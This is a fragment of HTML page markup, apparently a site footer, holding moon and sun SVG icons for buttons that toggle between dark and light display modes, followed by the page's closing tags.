<span class="relative inline-block align-text-bottom icon"><svg aria-hidden="true" focusable="false" data-prefix="fas" data-icon="moon" class="svg-inline--fa fa-moon fa-w-16" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path fill="currentcolor" d="M283.211 512c78.962.0 151.079-35.925 198.857-94.792 7.068-8.708-.639-21.43-11.562-19.35-124.203 23.654-238.262-71.576-238.262-196.954.0-72.222 38.662-138.635 101.498-174.394 9.686-5.512 7.25-20.197-3.756-22.23A258.156 258.156.0 00283.211.0c-141.309.0-256 114.511-256 256 0 141.309 114.511 256 256 256z"/></svg>
</span>
</button>
<button id=light-toggle onclick="setPreferredAppearance('light')" oncontextmenu="return setPreferredAppearance('default'),!1" class="hidden px-2 py-1 border rounded-md cursor-pointer dark:inline border-neutral-700 hover:text-primary-400 hover:border-primary-500" title=切换为浅色模式>
<span class="relative inline-block align-text-bottom icon"><svg aria-hidden="true" focusable="false" data-prefix="fas" data-icon="sun" class="svg-inline--fa fa-sun fa-w-16" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path fill="currentcolor" d="M256 160c-52.9.0-96 43.1-96 96s43.1 96 96 96 96-43.1 96-96-43.1-96-96-96zm246.4 80.5-94.7-47.3 33.5-100.4c4.5-13.6-8.4-26.5-21.9-21.9l-100.4 33.5-47.4-94.8c-6.4-12.8-24.6-12.8-31 0l-47.3 94.7L92.7 70.8c-13.6-4.5-26.5 8.4-21.9 21.9l33.5 100.4-94.7 47.4c-12.8 6.4-12.8 24.6.0 31l94.7 47.3-33.5 100.5c-4.5 13.6 8.4 26.5 21.9 21.9l100.4-33.5 47.3 94.7c6.4 12.8 24.6 12.8 31 0l47.3-94.7 100.4 33.5c13.6 4.5 26.5-8.4 21.9-21.9l-33.5-100.4 94.7-47.3c13-6.5 13-24.7.2-31.1zm-155.9 106c-49.9 49.9-131.1 49.9-181 0s-49.9-131.1.0-181 131.1-49.9 181 0 49.9 131.1.0 181z"/></svg>
</span>
</button>
</div>
</div>
</footer>
</body>
</html>